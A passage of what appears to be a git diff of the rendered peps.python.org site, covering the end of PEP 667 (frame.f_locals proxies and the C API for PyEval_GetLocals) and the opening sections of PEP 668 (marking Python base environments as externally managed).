PyEval_GetLocals() has never historically distinguished between whether it was +emulating locals() or sys._getframe().f_locals at the Python level, as they all +returned references to the same shared cache of the local variable bindings.

+

With this PEP, locals() changes to return independent snapshots on each call for +optimized frames, and frame.f_locals (along with PyFrame_GetLocals) changes to +return new write-through proxy instances.

+

Because PyEval_GetLocals() returns a borrowed reference, it isn’t possible to update +its semantics to align with either of those alternatives, leaving it as the only remaining +API that requires a shared cache dictionary stored on the frame object.

+

While this technically leaves the semantics of the function unchanged, it no longer allows +extra dict entries to be made visible to users of the other APIs, as those APIs are no longer +accessing the same underlying cache dictionary.

+

When PyEval_GetLocals() is being used as an equivalent to the Python locals() +builtin, PyEval_GetFrameLocals() should be used instead.

+

This code:

+
locals = PyEval_GetLocals();
+if (locals == NULL) {
+    goto error_handler;
+}
+Py_INCREF(locals);
+
+
+

should be replaced with:

+
// Equivalent to "locals()" in Python code
+locals = PyEval_GetFrameLocals();
+if (locals == NULL) {
+    goto error_handler;
+}
+
+
+

When PyEval_GetLocals() is being used as an equivalent to calling +sys._getframe().f_locals in Python, it should be replaced by calling +PyFrame_GetLocals() on the result of PyEval_GetFrame().

+

In these cases, the original code should be replaced with:

+
// Equivalent to "sys._getframe()" in Python code
+frame = PyEval_GetFrame();
+if (frame == NULL) {
+    goto error_handler;
+}
+// Equivalent to "frame.f_locals" in Python code
+locals = PyFrame_GetLocals(frame);
+frame = NULL; // Minimise visibility of borrowed reference
+if (locals == NULL) {
+    goto error_handler;
+}
+
+
+
+
+
+

Impact on PEP 709 inlined comprehensions

+

For inlined comprehensions within a function, locals() currently behaves the +same inside or outside of the comprehension, and this will not change. The +behavior of locals() inside functions will generally change as specified in +the rest of this PEP.

+

For inlined comprehensions at module or class scope, calling locals() within +the inlined comprehension returns a new dictionary for each call. This PEP will +make locals() within a function also always return a new dictionary for each +call, improving consistency; class or module scope inlined comprehensions will +appear to behave as if the inlined comprehension is still a distinct function.

+
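For example, at module scope (assuming a Python with PEP 709 inlined comprehensions):

+
# Each locals() call inside the inlined comprehension gets a new dict.
+snapshots = [locals() for _ in range(2)]
+assert snapshots[0] is not snapshots[1]
+
+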
+
+
+

Implementation

+

Each read of frame.f_locals will create a new proxy object that gives +the appearance of being the mapping of local (including cell and free) +variable names to the values of those local variables.

+

A possible implementation is sketched out below. +All attributes that start with an underscore are invisible and +cannot be accessed directly. +They serve only to illustrate the proposed design.

+
NULL: Object # NULL is a singleton representing the absence of a value.
+
+class CodeType:
+
+    _name_to_offset_mapping_impl: dict | NULL
+    _cells: frozenset # Set of indexes of cell and free variables
+    ...
+
+    def __init__(self, ...):
+        self._name_to_offset_mapping_impl = NULL
+        self._variable_names = deduplicate(
+            self.co_varnames + self.co_cellvars + self.co_freevars
+        )
+        ...
+
+    @property
+    def _name_to_offset_mapping(self):
+        "Mapping of names to offsets in local variable array."
+        if self._name_to_offset_mapping_impl is NULL:
+            self._name_to_offset_mapping_impl = {
+                name: index for (index, name) in enumerate(self._variable_names)
+            }
+        return self._name_to_offset_mapping_impl
+
+class FrameType:
+
+    _locals : array[Object] # The values of the local variables, items may be NULL.
+    _extra_locals: dict | NULL # Dictionary for storing extra locals not in _locals.
+    _locals_cache: FrameLocalsProxy | NULL # required to support PyEval_GetLocals()
+
+    def __init__(self, ...):
+        self._extra_locals = NULL
+        self._locals_cache = NULL
+        ...
+
+    @property
+    def f_locals(self):
+        return FrameLocalsProxy(self)
+
+class FrameLocalsProxy:
+    "Implements collections.MutableMapping."
+
+    __slots__ = ("_frame", )
+
+    def __init__(self, frame:FrameType):
+        self._frame = frame
+
+    def __getitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            val = f._locals[index]
+            if val is NULL:
+                raise KeyError(name)
+            if index in co._cells:
+                val = val.cell_contents
+                if val is NULL:
+                    raise KeyError(name)
+            return val
+        else:
+            if f._extra_locals is NULL:
+                raise KeyError(name)
+            return f._extra_locals[name]
+
+    def __setitem__(self, name, value):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            if index in co._cells:
+                cell = f._locals[index]
+                cell.cell_contents = value
+            else:
+                f._locals[index] = value
+        else:
+            if f._extra_locals is NULL:
+                f._extra_locals = {}
+            f._extra_locals[name] = value
+
+    def __iter__(self):
+        f = self._frame
+        co = f.f_code
+        yield from iter(f._extra_locals)
+        for index, name in enumerate(co._variable_names):
+            val = f._locals[index]
+            if val is NULL:
+                continue
+            if index in co._cells:
+                val = val.cell_contents
+                if val is NULL:
+                    continue
+            yield name
+
+    def __contains__(self, item):
+        f = self._frame
+        co = f.f_code
+        if f._extra_locals is not NULL and item in f._extra_locals:
+            return True
+        return item in co._variable_names
+
+    def __len__(self):
+        f = self._frame
+        co = f.f_code
+        res = 0
+        for index, _ in enumerate(co._variable_names):
+            val = f._locals[index]
+            if val is NULL:
+                continue
+            if index in co._cells:
+                if val.cell_contents is NULL:
+                    continue
+            res += 1
+        return res + (0 if f._extra_locals is NULL else len(f._extra_locals))
+
+
+
+

C API

+

PyEval_GetLocals() will be implemented roughly as follows:

+
PyObject *PyEval_GetLocals(void) {
+    PyFrameObject *frame = ...; // Get the current frame.
+    if (frame->_locals_cache == NULL) {
+        frame->_locals_cache = PyEval_GetFrameLocals();
+    } else {
+        PyDict_Update(frame->_locals_cache, PyFrame_GetLocals(frame));
+    }
+    return frame->_locals_cache;
+}
+
+
+

As with all functions that return a borrowed reference, care must be taken to +ensure that the reference is not used beyond the lifetime of the object.

+
+
+
+

Implementation Notes

+

When accepted, the PEP text suggested that PyEval_GetLocals would start returning a +cached instance of the new write-through proxy, while the implementation sketch indicated +it would continue to return a dictionary snapshot cached on the frame instance. This +discrepancy was identified while implementing the PEP, and +resolved by the Steering Council +in favour of retaining the Python 3.12 behaviour of returning a dictionary snapshot +cached on the frame instance. +The PEP text has been updated accordingly.

+

During the discussions of the C API clarification, it also became apparent that the +rationale behind locals() being updated to return independent snapshots in +optimized scopes wasn’t clear, as it had been inherited +from the original PEP 558 discussions rather than being independently covered in this +PEP. The PEP text has been updated to better cover this change, with additional updates +to the Specification and Backwards Compatibility sections to cover the impact on code +execution APIs that default to executing code in the locals() namespace. Additional +motivation and rationale details have also been added to PEP 558.

+

In 3.13.0, the write-through proxies did not allow deletion of even extra variables +with del and pop(). This was subsequently reported as a +compatibility regression, +and resolved as now described +in The frame.f_locals attribute.

+
+
+

Comparison with PEP 558

+

This PEP and PEP 558 shared a common goal: +to make the semantics of locals() and frame.f_locals +intelligible, and their operation reliable.

+

The key difference between this PEP and PEP 558 is that +PEP 558 attempted to store extra variables inside a full +internal dictionary copy of the local variables in an effort +to improve backwards compatibility with the legacy +PyEval_GetLocals() API, whereas this PEP does not (it stores +the extra local variables in a dedicated dictionary accessed +solely via the new frame proxy objects, and copies them to the +PyEval_GetLocals() shared dict only when requested).

+

PEP 558 did not specify exactly when that internal copy was +updated, making the behavior of PEP 558 impossible to reason +about in several cases where this PEP remains well specified.

+

PEP 558 also proposed the introduction of some additional Python +scope introspection interfaces to the C API that would allow +extension modules to more easily determine whether the currently +active Python scope is optimized or not, and hence whether +the C API’s locals() equivalent returns a direct reference +to the frame’s local execution namespace or a shallow copy of +the frame’s local variables and nonlocal cell references. +Whether or not to add such introspection APIs is independent +of the proposed changes to locals() and frame.f_locals +and hence no such proposals have been included in this PEP.

+

PEP 558 was +ultimately withdrawn +in favour of this PEP.

+
+
+

Reference Implementation

+

The implementation is in development as a draft pull request on GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0667.rst

+

Last modified: 2024-10-27 07:11:46 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0668/index.html b/pep-0668/index.html new file mode 100644 index 00000000000..c27b5086704 --- /dev/null +++ b/pep-0668/index.html @@ -0,0 +1,1162 @@ + PEP 668 – Marking Python base environments as “externally managed” | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 668 – Marking Python base environments as “externally managed”

+
+
Author:
+
Geoffrey Thomas <geofft at ldpreload.com>, +Matthias Klose <doko at ubuntu.com>, +Filipe Laíns <lains at riseup.net>, +Donald Stufft <donald at stufft.io>, +Tzu-ping Chung <uranusjr at gmail.com>, +Stefano Rivera <stefanor at debian.org>, +Elana Hashman <ehashman at debian.org>, +Pradyun Gedam <pradyunsg at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-May-2021
+
Post-History:
+
28-May-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Externally Managed Environments, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

A long-standing practical problem for Python users has been conflicts +between OS package managers and Python-specific package management +tools like pip. These conflicts include both Python-level API +incompatibilities and conflicts over file ownership.

+

Historically, Python-specific package management tools have defaulted +to installing packages into an implicit global context. With the +standardization and popularity of virtual environments, a better +solution for most (but not all) use cases is to use Python-specific +package management tools only within a virtual environment.

+

This PEP proposes a mechanism for a Python installation to communicate +to tools like pip that its global package installation context is +managed by some means external to Python, such as an OS package +manager. It specifies that Python-specific package management tools +should neither install nor remove packages into the interpreter’s +global context, by default, and should instead guide the end user +towards using a virtual environment.

+

It also standardizes an interpretation of the sysconfig schemes so +that, if a Python-specific package manager is about to install a +package in an interpreter-wide context, it can do so in a manner that +will avoid conflicting with the external package manager and reduces +the risk of breaking software shipped by the external package manager.

+
+
+

Terminology

+

A few terms used in this PEP have multiple meanings in the contexts +that it spans. For clarity, this PEP uses the following terms in +specific ways:

+
+
distro
Short for “distribution,” a collection of various sorts of +software, ideally designed to work properly together, including +(in contexts relevant to this document) the Python interpreter +itself, software written in Python, and software written in other +languages. That is, this is the sense used in phrases such as +“Linux distro” or “Berkeley Software Distribution.”

A distro can be an operating system (OS) of its own, such as +Debian, Fedora, or FreeBSD. It can also be an overlay distribution +that installs on top of an existing OS, such as Homebrew or +MacPorts.

+

This document uses the short term “distro,” because the term +“distribution” has another meaning in Python packaging contexts: a +source or binary distribution package of a single piece of Python +language software, that is, in the sense of +setuptools.dist.Distribution or “sdist”. To avoid confusion, +this document does not use the plain term “distribution” at all. +In the Python packaging sense, it uses the full phrase +“distribution package” or just “package” (see below).

+

The provider of a distro - the team or company that collects and +publishes the software and makes any needed modifications - is its +distributor.

+
+
package
A unit of software that can be installed and used within Python. +That is, this refers to what Python-specific packaging tools tend +to call a “distribution package” or simply a “distribution”; +the colloquial abbreviation “package” is used in the sense of the +Python Package Index.

This document does not use “package” in the sense of an importable +name that contains Python modules, though in many cases, a +distribution package consists of a single importable package of +the same name.

+

This document generally does not use the term “package” to refer +to units of installation by a distro’s package manager (such as +.deb or .rpm files). When needed, it uses phrasing such as +“a distro’s package.” (Again, in many cases, a Python package is +shipped inside a distro’s package named something like python- +plus the Python package name.)

+
+
Python-specific package manager
A tool for installing, upgrading, and/or removing Python packages +in a manner that conforms to Python packaging standards (such as +PEP 376 and PEP 427). The most popular Python-specific package +manager is pip [1]; other examples include the old Easy +Install command [2] as well as direct usage of a +setup.py command.

(Conda [3] is a bit of a special case, as the conda +command can install much more than just Python packages, making it +more like a distro package manager in some senses. Since the +conda command generally only operates on Conda-created +environments, most of the concerns in this document do not apply +to conda when acting as a Python-specific package manager.)

+
+
distro package manager
A tool for installing, upgrading, and/or removing a distro’s +packages in an installed instance of that distro, which is capable +of installing Python packages as well as non-Python packages, and +therefore generally has its own database of installed software +unrelated to PEP 376. Examples include apt, dpkg, dnf, +rpm, pacman, and brew. The salient feature is that if +a package was installed by a distro package manager, removing or +upgrading it in a way that would satisfy a Python-specific package +manager will generally leave a distro package manager in an +inconsistent state.

This document also uses phrases like “external package manager” or +“system’s package manager” to refer to a distro package manager in +certain contexts.

+
+
shadow
To shadow an installed Python package is to cause some other +package to be preferred for imports without removing any files +from the shadowed package. This requires multiple entries on +sys.path: if package A 2.0 installs module a.py in one +sys.path entry, and package A 1.0 installs module a.py in +a later sys.path entry, then import a returns the module +from the former, and we say that A 2.0 shadows A 1.0.
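As a concrete sketch of this definition (the directory names here are hypothetical, invented for illustration):

import sys

# Both directories are hypothetical; each is assumed to contain its own a.py.
sys.path.insert(0, "/opt/A-2.0/site-packages")  # earlier entry: A 2.0
sys.path.append("/opt/A-1.0/site-packages")     # later entry: A 1.0

import a  # resolves to /opt/A-2.0/site-packages/a.py: A 2.0 shadows A 1.0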
+
+
+
+

Motivation

+

Thanks to Python’s immense popularity, software distros (by which we +mean Linux and other OS distros as well as overlay distros like +Homebrew and MacPorts) generally ship Python for two purposes: as a +software package to be used in its own right by end users, and as a +language dependency for other software in the distro.

+

For example, Fedora and Debian (and their downstream distros, as well +as many others) ship a /usr/bin/python3 binary which provides the +python3 command available to end users as well as the +#!/usr/bin/python3 shebang for Python-language software included +in the distro. Because there are no official binary releases of Python +for Linux/UNIX, almost all Python end users on these OSes use the +Python interpreter built and shipped with their distro.

+

The python3 executable available to the users of the distro and +the python3 executable available as a dependency for other +software in the distro are typically the same binary. This means that +if an end user installs a Python package using a tool like pip +outside the context of a virtual environment, that package is visible +to Python-language software shipped by the distro. If the +newly-installed package (or one of its dependencies) is a newer, +backwards-incompatible version of a package that was installed through +the distro, it may break software shipped by the distro.

+

This may pose a critical problem for the integrity of distros, which +often have package-management tools that are themselves written in +Python. For example, it’s possible to unintentionally break Fedora’s +dnf command with a pip install command, making it hard to +recover.

+

This applies both to system-wide installs (sudo pip install) as +well as user home directory installs (pip install --user), since +packages in either location show up on the sys.path of +/usr/bin/python3.

+

There is a worse problem with system-wide installs: if you attempt to +recover from this situation with sudo pip uninstall, you may end +up removing packages that are shipped by the system’s package manager. +In fact, this can even happen if you simply upgrade a package - pip +will try to remove the old version of the package, as shipped by the +OS. At this point it may not be possible to recover the system to a +consistent state using just the software remaining on the system.

+

Over the past many years, a consensus has emerged that the best way to +install Python libraries or applications (when not using a distro’s +package) is to use a virtual environment. This approach was +popularized by the PyPA virtualenv project, and a simple version of +that approach is now available in the Python standard library as +venv. Installing a Python package into a virtualenv prevents it +from being visible to the unqualified /usr/bin/python3 interpreter +and prevents breaking system software.

+

In some cases, however, it’s useful and intentional to install a +Python package from outside of the distro that influences the behavior +of distro-shipped commands. This is common in the case of software +like Sphinx or Ansible which have a mechanism for writing +Python-language extensions. A user may want to use their distro’s +version of the base software (for reasons of paid support or security +updates) but install a small extension from PyPI, and they’d want that +extension to be importable by the software in their base system.

+

While this continues to carry the risk of installing a newer version +of a dependency than the operating system expects or otherwise +negatively affecting the behavior of an application, it does not need +to carry the risk of removing files from the operating system. A tool +like pip should be able to install packages in some directory on the +default sys.path, if specifically requested, without deleting +files owned by the system’s package manager.

+

Therefore, this PEP proposes two things.

+

First, it proposes a way for distributors of a Python interpreter to +mark that interpreter as having its packages managed by means external +to Python, such that Python-specific tools like pip should not +change the installed packages in the interpreter’s global sys.path +in any way (add, upgrade/downgrade, or remove) unless specifically +overridden. It also provides a means for the distributor to indicate +how to use a virtual environment as an alternative.

+

This is an opt-in mechanism: by default, the Python interpreter +compiled from upstream sources will not be so marked, and so running +pip install with a self-compiled interpreter, or with a distro +that has not explicitly marked its interpreter, will work as it always +has worked.

+

Second, it sets the rule that when installing packages to an +interpreter’s global context (either to an unmarked interpreter, or if +overriding the marking), Python-specific package managers should +modify or delete files only within the directories of the sysconfig +scheme in which they would create files. This permits a distributor +of a Python interpreter to set up two directories, one for its own +managed packages, and one for unmanaged packages installed by the end +user, and ensure that installing unmanaged packages will not delete +(or overwrite) files owned by the external package manager.

+
+
+

Rationale

+

As described in detail in the next section, the first behavior change +involves creating a marker file named EXTERNALLY-MANAGED, whose +presence indicates that non-virtual-environment package installations +are managed by some means external to Python, such as a distro’s +package manager. This file is specified to live in the stdlib +directory in the default sysconfig scheme, which marks the +interpreter / installation as a whole, not a particular location on +sys.path. The reason for this is that, as identified above, there +are two related problems that risk breaking an externally-managed +Python: you can install an incompatible new version of a package +system-wide (e.g., with sudo pip install), and you can install one +in your user account alone, but in a location that is on the standard +Python command’s sys.path (e.g., with pip install --user). If +the marker file were in the system-wide site-packages directory, +it would not clearly apply to the second case. The Alternatives +section has further discussion of possible locations.

+

The second behavior change takes advantage of the existing +sysconfig setup in distros that have already encountered this +class of problem, and specifically addresses the problem of a +Python-specific package manager deleting or overwriting files that are +owned by an external package manager.

+
+

Use cases

+

The changed behavior in this PEP is intended to “do the right thing” +for as many use cases as possible. In this section, we consider the +changes specified by this PEP for several representative use cases / +contexts. Specifically, we ask about the two behaviors that could be +changed by this PEP:

+
    +
  1. Will a Python-specific installer tool like pip install permit +installations by default, after implementation of this PEP?
  2. If you do run such a tool, should it be willing to delete packages shipped by the external (non-Python-specific) package manager for that context, such as a distro package manager?
+

(For simplicity, this section discusses pip as the Python-specific +installer tool, though the analysis should apply equally to any other +Python-specific package management tool.)

+

This table summarizes the use cases discussed in detail below:

Case | Description | pip install permitted | Deleting externally-installed packages permitted
-----|-------------|-----------------------|-------------------------------------------------
1 | Unpatched CPython | Currently yes; stays yes | Currently yes; stays yes
2 | Distro /usr/bin/python3 | Currently yes; becomes no (assuming the distro adds a marker file) | Currently yes (except on Debian); becomes no
3 | Distro Python in venv | Currently yes; stays yes | There are no externally-installed packages
4 | Distro Python in venv with --system-site-packages | Currently yes; stays yes | Currently no; stays no
5 | Distro Python in Docker | Currently yes; becomes no (assuming the distro adds a marker file) | Currently yes; becomes no
6 | Conda environment | Currently yes; stays yes | Currently yes; stays yes
7 | Dev-facing distro | Currently yes; becomes no (assuming they add a marker file) | Currently often yes; becomes no (assuming they configure sysconfig as needed)
8 | Distro building packages | Currently yes; can stay yes | Currently yes; becomes no
9 | PYTHONHOME copied from a distro Python stdlib | Currently yes; becomes no | Currently yes; becomes no
10 | PYTHONHOME copied from upstream Python stdlib | Currently yes; stays yes | Currently yes; stays yes
+

In more detail, the use cases above are:

+
    +
  1. A standard unpatched CPython, without any special configuration of +or patches to sysconfig and without a marker file. This PEP +does not change its behavior.

    Such a CPython should (regardless of this PEP) not be installed in +a way that overlaps any distro-installed Python on the same system. +For instance, on an OS that ships Python in /usr/bin, you +should not install a custom CPython built with ./configure +--prefix=/usr, or it will overwrite some files from the distro +and the distro will eventually overwrite some files from your +installation. Instead, your installation should be in a separate +directory (perhaps /usr/local, /opt, or your home +directory).

    +

    Therefore, we can assume that such a CPython has its own stdlib +directory and its own sysconfig schemes that do not overlap any +distro-installed Python. So any OS-installed packages are not +visible or relevant here.

    +

    If there is a concept of “externally-installed” packages in this +case, it’s something outside the OS and generally managed by +whoever built and installed this CPython. Because the installer +chose not to add a marker file or modify sysconfig schemes, +they’re choosing the current behavior, and pip install can +remove any packages available in this CPython.

    +
  2. A distro’s /usr/bin/python3, either when running pip install as root or pip install --user, following our Recommendations for distros.

    These recommendations include shipping a marker file in the +stdlib directory, to prevent pip install by default, and +placing distro-shipped packages in a location other than the +default sysconfig scheme, so that pip as root does not +write to that location.

    +

    Many distros (including Debian, Fedora, and their derivatives) are +already doing the latter.

    +

    On Debian and derivatives, pip install does not currently +delete distro-installed packages, because Debian carries a patch +to pip to prevent this. So, for those distros, this PEP is not a +behavior change; it simply standardizes that behavior in a way that +is no longer Debian-specific and can be included into upstream pip.

    +

    (We have seen user reports of externally-installed packages being +deleted on Debian or a derivative. We suspect this is because the +user has previously run sudo pip install --upgrade pip and +therefore now has a version of /usr/bin/pip without the Debian +patch; standardizing this behavior in upstream package installers +would address this problem.)

    +
  3. A distro Python when used inside a virtual environment (either from venv or virtualenv).

    Inside a virtual environment, all packages are owned by that +environment. Even when pip, setuptools, etc. are installed +into the environment, they are and should be managed by tools +specific to that environment; they are not system-managed.

    +
  4. A distro Python when used inside a virtual environment with --system-site-packages. This is like the previous case, but worth calling out explicitly, because anything on the global sys.path is visible.

    Currently, the answer to “Will pip delete externally-installed +packages” is no, because pip has a special case for running in a +virtual environment and attempting to delete packages outside it. +After this PEP, the answer remains no, but the reasoning becomes +more general: system site packages will be outside any of the +sysconfig schemes used for package management in the +environment.

    +
  5. A distro Python when used in a single-application container image (e.g., a Docker container). In this use case, the risk of breaking system software is lower, since generally only a single application runs in the container, and the impact is lower, since you can rebuild the container and you don’t have to struggle to recover a running machine. There are also a large number of existing Dockerfiles with an unqualified RUN pip install ... statement, etc., and it would be good not to break those. So, builders of base container images may want to ensure that the marker file is not present, even if the underlying OS ships one by default.

    There is a small behavior change: currently, pip run as root +will delete externally-installed packages, but after this PEP it +will not. We don’t propose a way to override this. However, since +the base image is generally minimal, there shouldn’t be much of a +use case for simply uninstalling packages (especially without using +the distro’s own tools). The common case is when pip wants to +upgrade a package, which previously would have deleted the old +version (except on Debian). After this change, the old version will +still be on disk, but pip will still shadow externally-installed +packages, and we believe this to be sufficient for this not to be a +breaking change in practice - a Python import statement will +still get you the newly-installed package.

    +

    If it becomes necessary to have a way to do this, we suggest that +the distro should document a way for the installer tool to access +the sysconfig scheme used by the distro itself. See the +Recommendations for distros section for more discussion.

    +

    It is the view of the authors of this PEP that it’s still a good +idea to use virtual environments with distro-installed Python +interpreters, even in single-application container images. Even +though they run a single application, that application may run +commands from the OS that are implemented in Python, and if you’ve +installed or upgraded the distro-shipped Python packages using +Python-specific tools, those commands may break.

    +
  6. Conda specifically supports the use of non-conda tools like pip to install software not available in the Conda repositories. In this context, Conda acts as the external package manager / distro and pip as the Python-specific one.

    In some sense, this is similar to the first case, since Conda +provides its own installation of the Python interpreter.

    +

    We don’t believe this PEP requires any changes to Conda, and +versions of pip that have implemented the changes in this PEP will +continue to behave as they currently do inside Conda environments. +(That said, it may be worth considering whether to use separate +sysconfig schemes for pip-installed and Conda-installed +software, for the same reasons it’s a good idea for other distros.)

    +
  7. By a “developer-facing distro,” we mean a specific type of distro where direct users of Python or other languages in the distro are expected or encouraged to make changes to the distro itself if they wish to add libraries. Common examples include private “monorepos” at software development companies, where a single repository builds both third-party and in-house software, and the direct users of the distro’s Python interpreter are generally software developers writing said in-house software. User-level package managers like Nixpkgs may also count, because they encourage users of Nix who are Python developers to package their software for Nix.

    In these cases, the distro may want to respond to an attempted +pip install with guidance encouraging use of the distro’s own +facilities for adding new packages, along with a link to +documentation.

    +

    If the distro supports/encourages creating a virtual environment +from the distro’s Python interpreter, there may also be custom +instructions for how to properly set up a virtual environment (as +for example Nixpkgs does).

    +
  8. When building distro Python packages for a distro Python (case 2), it may be useful to have pip install be usable as part of the distro’s package build process. (Consider, for instance, building a python-xyz RPM by using pip install . inside an sdist / source tarball for xyz.) The distro may also want to use a more targeted but still Python-specific installation tool such as installer.

    For this case, the build process will need to find some way to +suppress the marker file to allow pip install to work, and will +probably need to point the Python-specific tool at the distro’s +sysconfig scheme instead of the shipped default. See the +Recommendations for distros section for more discussion on how +to implement this.

    +

    As a result of this PEP, pip will no longer be able to remove +packages already on the system. However, this behavior change is +fine because a package build process should not (and generally +cannot) include instructions to delete some other files on the +system; it can only package up its own files.

    +
  9. A distro Python used with PYTHONHOME to set up an alternative Python environment (as opposed to a virtual environment), where PYTHONHOME is set to some directory copied directly from the distro Python (e.g., cp -a /usr/lib/python3.x pyhome/lib).

    Assuming there are no modifications, then the behavior is just like +the underlying distro Python (case 2). So there are behavior +changes - you can no longer pip install by default, and if you +override it, it will no longer delete externally-installed packages +(i.e., Python packages that were copied from the OS and live in the +OS-managed sys.path entry).

    +

    This behavior change seems to be defensible, in that if your +PYTHONHOME is a straight copy of the distro’s Python, it should +behave like the distro’s Python.

    +
  10. A distro Python (or any Python interpreter) used with a PYTHONHOME taken from a compatible unmodified upstream Python.

    Because the behavior changes in this PEP are keyed off of files in +the standard library (the marker file in stdlib and the +behavior of the sysconfig module), the behavior is just like +an unmodified upstream CPython (case 1).

    +
+
+
+
+

Specification

+
+

Marking an interpreter as using an external package manager

+

Before a Python-specific package installer (that is, a tool such as +pip - not an external tool such as apt) installs a package into a +certain Python context, it should make the following checks by +default:

+
    +
  1. Is it running outside of a virtual environment? It can determine +this by whether sys.prefix == sys.base_prefix (but see +Backwards Compatibility).
  2. Is there an EXTERNALLY-MANAGED file in the directory identified by sysconfig.get_path("stdlib", sysconfig.get_default_scheme())?
+

If both of these conditions are true, the installer should exit with an error message indicating that package installations into this Python interpreter’s directories are disabled outside of a virtual environment.
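A minimal sketch of these default checks, using only the standard sys and sysconfig modules (this is not pip’s actual implementation):

import sys
import sysconfig
from pathlib import Path

def install_blocked_by_default() -> bool:
    # 1. Outside a virtual environment?
    outside_venv = sys.prefix == sys.base_prefix
    # 2. Marker file present in the stdlib directory of the default scheme?
    stdlib = Path(sysconfig.get_path("stdlib", sysconfig.get_default_scheme()))
    return outside_venv and (stdlib / "EXTERNALLY-MANAGED").exists()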

+

The installer should have a way for the user to override these rules, +such as a command-line flag --break-system-packages. This option +should not be enabled by default and should carry some connotation +that its use is risky.

+

The EXTERNALLY-MANAGED file is an INI-style metadata file intended +to be parsable by the standard library configparser module. If the +file can be parsed by +configparser.ConfigParser(interpolation=None) using the UTF-8 +encoding, and it contains a section [externally-managed], then the +installer should look for an error message specified in the file and +output it as part of its error. If the first element of the tuple +returned by locale.getlocale(locale.LC_MESSAGES), i.e., the +language code, is not None, it should look for the error message +as the value of a key named Error- followed by the language code. +If that key does not exist, and if the language code contains +underscore or hyphen, it should look for a key named Error- +followed by the portion of the language code before the underscore or +hyphen. If it cannot find either of those, or if the language code is +None, it should look for a key simply named Error.

+

If the installer cannot find an error message in the file (either +because the file cannot be parsed or because no suitable error key +exists), then the installer should just use a pre-defined error +message of its own, which should suggest that the user create a +virtual environment to install packages.
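A hedged sketch of the lookup logic described above; real installers may differ in details, and locale.LC_MESSAGES is not available on all platforms:

import configparser
import locale

def externally_managed_error(path):
    parser = configparser.ConfigParser(interpolation=None)
    try:
        with open(path, encoding="utf-8") as f:
            parser.read_file(f)
    except (OSError, UnicodeDecodeError, configparser.Error):
        return None  # unparsable: fall back to the installer's own message
    if not parser.has_section("externally-managed"):
        return None
    section = parser["externally-managed"]
    lang, _ = locale.getlocale(locale.LC_MESSAGES)
    candidates = []
    if lang is not None:
        candidates.append(f"Error-{lang}")
        for sep in ("_", "-"):
            if sep in lang:
                # e.g. "de_DE" also tries "Error-de"
                candidates.append(f"Error-{lang.split(sep, 1)[0]}")
    candidates.append("Error")
    for key in candidates:
        if key in section:
            return section[key]
    return None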

+

Software distributors who have a non-Python-specific package manager that manages libraries in the sys.path of their Python package should, in general, ship an EXTERNALLY-MANAGED file in their standard library directory. For instance, Debian may ship a file in /usr/lib/python3.9/EXTERNALLY-MANAGED consisting of something like

+
[externally-managed]
+Error=To install Python packages system-wide, try apt install
+ python3-xyz, where xyz is the package you are trying to
+ install.
+
+ If you wish to install a non-Debian-packaged Python package,
+ create a virtual environment using python3 -m venv path/to/venv.
+ Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
+ sure you have python3-full installed.
+
+ If you wish to install a non-Debian packaged Python application,
+ it may be easiest to use pipx install xyz, which will manage a
+ virtual environment for you. Make sure you have pipx installed.
+
+ See /usr/share/doc/python3.9/README.venv for more information.
+
+
+

which provides useful and distro-relevant information +to a user trying to install a package. Optionally, +translations can be provided in the same file:

+
Error-de_DE=Wenn ist das Nunstück git und Slotermeyer?
+
+ Ja! Beiherhund das Oder die Virtualenvironment gersput!
+
+
+

In certain contexts, such as single-application container images that +aren’t updated after creation, a distributor may choose not to ship an +EXTERNALLY-MANAGED file, so that users can install whatever they +like (as they can today) without having to manually override this +rule.

+
+
+

Writing to only the target sysconfig scheme

+

Usually, a Python package installer installs to directories in a +scheme returned by the sysconfig standard library package. +Ordinarily, this is the scheme returned by +sysconfig.get_default_scheme(), but based on configuration (e.g. +pip install --user), it may use a different scheme.
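For illustration, one way to inspect the directories covered by the default scheme (purely informational):

import sysconfig

scheme = sysconfig.get_default_scheme()
for name in sysconfig.get_path_names():
    print(f"{name}: {sysconfig.get_path(name, scheme)}")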

+

Whenever the installer is installing to a sysconfig scheme, this +PEP specifies that the installer should never modify or delete files +outside of that scheme. For instance, if it’s upgrading a package, and +the package is already installed in a directory outside that scheme +(perhaps in a directory from another scheme), it should leave the +existing files alone.

+

If the installer does end up shadowing an existing installation during an upgrade, we recommend that it produce a warning at the end of its run.

+

If the installer is installing to a location outside of a +sysconfig scheme (e.g., pip install --target), then this +subsection does not apply.

+
+
+
+

Recommendations for distros

+

This section is non-normative. It provides best practices we believe +distros should follow unless they have a specific reason otherwise.

+
+

Mark the installation as externally managed

+

Distros should create an EXTERNALLY-MANAGED file in their +stdlib directory.

+
+
+

Guide users towards virtual environments

+

The file should contain a useful and distro-relevant error message +indicating both how to install system-wide packages via the distro’s +package manager and how to set up a virtual environment. If your +distro is often used by users in a state where the python3 command +is available (and especially where pip or get-pip is +available) but python3 -m venv does not work, the message should +indicate clearly how to make python3 -m venv work properly.

+

Consider packaging pipx, a tool for installing Python-language +applications, and suggesting it in the error. pipx automatically +creates a virtual environment for that application alone, which is a +much better default for end users who want to install some +Python-language software (which isn’t available in the distro) but are +not themselves Python users. Packaging pipx in the distro avoids the +irony of instructing users to pip install --user +--break-system-packages pipx to avoid breaking system packages. +Consider arranging things so your distro’s package / environment for +Python for end users (e.g., python3 on Fedora or python3-full +on Debian) depends on pipx.

+
+
+

Keep the marker file in container images

+

Distros that produce official images for single-application containers +(e.g., Docker container images) should keep the +EXTERNALLY-MANAGED file, preferably in a way that makes it not +go away if a user of that image installs package updates inside +their image (think RUN apt-get dist-upgrade).

+
+
+

